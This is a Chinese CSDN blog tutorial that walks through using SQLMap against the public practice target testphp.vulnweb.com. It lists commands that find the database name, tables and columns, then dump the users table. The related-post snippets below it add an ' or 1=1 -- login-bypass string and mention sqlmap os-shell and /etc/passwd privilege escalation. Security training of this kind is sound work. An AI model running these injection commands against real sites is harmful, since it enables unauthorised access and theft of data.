php mysql注入靶机_六步骤活用SQLMap(以testphp.vulnweb.com为测试靶机)

最新推荐文章于 2024-06-08 09:35:05 发布
最新推荐文章于 2024-06-08 09:35:05 发布
阅读量1k 收藏 2
点赞数 1
文章标签: php mysql注入靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42477505/article/details/113636999
版权
本文详细介绍了如何使用SQLMap工具对PHP MySQL注入靶机testphp.vulnweb.com进行渗透测试。首先,搭建Python 2.7.X和SQLMap环境;接着,通过ZAP等扫描工具发现SQL注入点。然后,利用SQLMap获取了当前数据库名称、表名、列名,并最终读取了指定表中的数据。
摘要由CSDN通过智能技术生成

1、搭建Python 2.7.X 和SQLmap环境;

2、使用web扫描工具(如ZAP等)找到SQL的可能注入点:“http://testphp.vulnweb.com/artists.php?artist=1”;

3、使用sqlmap 获取当前数据库名称

sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --current-db

运行结果如下:837b5272332b0e41bcdbf5ef8cf4625b.png

4、使用sqlmap 列表名

sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --table -D  acuart

运行结果如下:

ee912def04b32c4923ac2ae43a0b14d1.png

5、使用sqlmap 列字段名称

sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --columns -T users -D acuart -v 0

运行结果如下:

07b9989efbf95028312e959737518e43.png

6、使用sqlmap 获取字段内容

sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dump -T users -D acuart -v 0

运行结果如下:

cc0287c0d7b7678042c476f5d2d9a9e5.png

Henri Sun
关注
vuln-websvr:为网络练习和培训而构建的易受攻击的Web服务器
03-26
vuln-websvr 为网络练习和培训而构建的易受攻击的Web服务器 缺点: 验证 无需身份验证即可与api端点进行交互 MD5无盐哈希值用于密码存储 数据模式中包含的密码哈希(与json对象一起返回) 验证 不受限制的文件上传 本地文件包含(待办事项) 注射(待办) sql注入 服务器端模板注入 参考: style.css-bulma.io v0.7.2 | MIT许可证|
步骤活用SQLMap(以testphp.vulnweb.com测试靶机
weixin_33700350的博客
08-28 3048
1、搭建Python 2.7.X 和SQLmap环境;2、使用web扫描工具(如ZAP等)找到SQL的可能注入点:“http://testphp.vulnweb.com/artists.php?artist=1”;3、使用sqlmap 获取当前数据库名称sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1"...
050 文件包含testphp.vulnweb.com/showimage.php?file=showimage.php
最新发布
qq_16163981的博客
06-08 230
靶场地址testphp.vulnweb.com/showimage.php?
web安全攻防演练网站 靶机 测试环境 收集
whatday的专栏
09-09 4227
http://demo.testfire.net http://testphp.vulnweb.com http://testasp.vulnweb.com http://testaspnet.vulnweb.com http://zero.webappsecurity.com http://crackme.cenzic.com http://www.webscantest.com ...
MyOA.rar_easy _myoa_myoa靶机_oa_ssh mysql 框架
09-24
【标题】"MyOA.rar_easy_myoa_myoa靶机_oa_ssh mysql 框架" 描述了一个基于SSH框架和MySQL数据库的在线办公(OA)系统,名为MyOA,并且它具有一个易于使用的前端界面——Easy UI。这个项目可能用于企业内部的自动化...
安装部署Web安全测试用的靶机
11-24
本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是一个集成的Web服务器套件,包含了Apache、MySQLPHP和Perl等组件...
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
探秘Java EE VulnWeb:实战安全漏洞的学习神器
gitblog_00039的博客
04-24 416
探秘Java EE VulnWeb:实战安全漏洞的学习神器 项目地址:https://gitcode.com/mtxiaowangzi/Java-EE-VulnWeb 项目简介 Java EE VulnWeb 是一个基于Java EE开发的在线实验平台,旨在帮助开发者、安全研究人员和学生更好地理解和学习常见的Web应用安全漏洞。通过模拟真实的漏洞环境,它提供了丰富的练习场景,让学习者能够亲手实践并...
SQL注入点自动化利用测试工具—shoryuken
echocdzh的博客
12-07 1006
ryuken是一款linux bash工具,可以对存在SQL注入漏洞的主机(且未站库分离)进行自动化利用测试,简化了繁琐的手工操作。值得一提的是,由于适用于注入点的渗透测试,这个工具可能需要应用具有较高的数据库权限(SA or System) ./shoryuken1.1 -i ./shoryuken1.1 -p "192.168.0.2/test.asp?id=1" ./sho
SQL注入攻击——sqlmap的使用
m0_57069925的博客
06-03 3935
所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。数据库都是Web应用环境中非常重要的环节。SQL命令就是前端Web和后端数据库之间的接口,使得数据可以传递到Web应用程序,也可以从其中发送出来。需要对这些数据进行控制,保证用户只能得到授权给他的信息。可是,很多Web站点都会利用用户输入的参数动态的生成SQL查询要求,攻击者通过在URL、表格域,或者其他的输入域中输入自己的SQL命令,以此改变查询属性,骗过应用程序,从而可以对数据库进
sql注入漏洞--sqlmap使用
qq_43710889的博客
06-16 2782
文章目录sql注入漏洞--sqlmap使用基本流程:实战get请求命令:`python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --users`命令:`python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs`命令:`python sqlmap.py -u "http://testphp.vulnweb.com/artists.p
【敛洞神器】Xray高级联动
jijisaq的博客
04-07 1372
Xray 是一款功能强大的安全评估工具,由多名经验丰富的一线安全从业者呕心打造而成,可支持与AWVS,BP等众多安全工具联合使用。
sql注入,一个例子让你知道什么是sql注入
热门推荐
qq_41246635的博客
08-03 1万+
sql注入,一个例子让你知道什么是sql注入 这篇文章说的非常好 https://www.cnblogs.com/sdya/p/4568548.html 我就是按照文中例子,亲自在我之前用final框架做的项目中,操作了一遍,的确是实现了用户登录。 在不知道用户名和密码的情况下实现了用户登录 重现sql注入过程如下: 1、在用户名输入' or 1=1 --,然后随便输入一个密码 ...
XRAY与Burp、AppScan、AWVS联动
LuckySec
06-03 6425
PS:欢迎访问我的个人博客 http://luckyzmj.cn 0x01 XRAY 扫描器 xray 是从长亭洞鉴核心引擎中提取出的社区版漏洞扫描神器,支持主动、被动多种扫描方式,自备盲打平台、可以灵活定义 POC,功能丰富,调用简单,支持 Windows / macOS / Linux 多种操作系统,可以满足广大安全从业者的自动化 Web 漏洞探测需求。 GitHub地址:https://github.com/chaitin/xray 官方文档:https://xray.cool/xray/#/tu
Vuln靶机系列:01Ai-Web1-渗透测试综合利用-对新手非常友好!!!
weixin_45965246的博客
09-17 421
首次使用sqlmapweb系统注入shell文件(之前一直以为只是获取账密)对目录扫描更深一步的理解,之前很少会有目录扫描,压根不想扫最关键一步就是–os-shell不能使用报错注入方式注入首次完整提权过程,之前没有接触过提权,也仅仅是了解没有实战对新手非常友好,是一个值得巩固知识体系的靶场。/etc/passwd的用户添加格式可能需要记录一下用户名:密码:UID(用户ID):GID(组ID):描述性信息:主目录:默认Shell。
一些可供扫描测试的站点
sinat_35416215的博客
12-13 1914
http://testhtml5.vulnweb.com http://testphp.vulnweb.com http://testasp.vulnweb.com http://testaspnet.vulnweb.com
"Web安全测试靶机部署实验指南 2021.11.24
本次实验的名称是“安装部署Web安全测试用的靶机”,实验人是杨子浩,日期是2021年11月24日。实验的目的是为了安装并部署一个用于Web安全测试靶机。 实验的拓扑是在本地环境中进行,使用了XAMPP作为服务器软件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值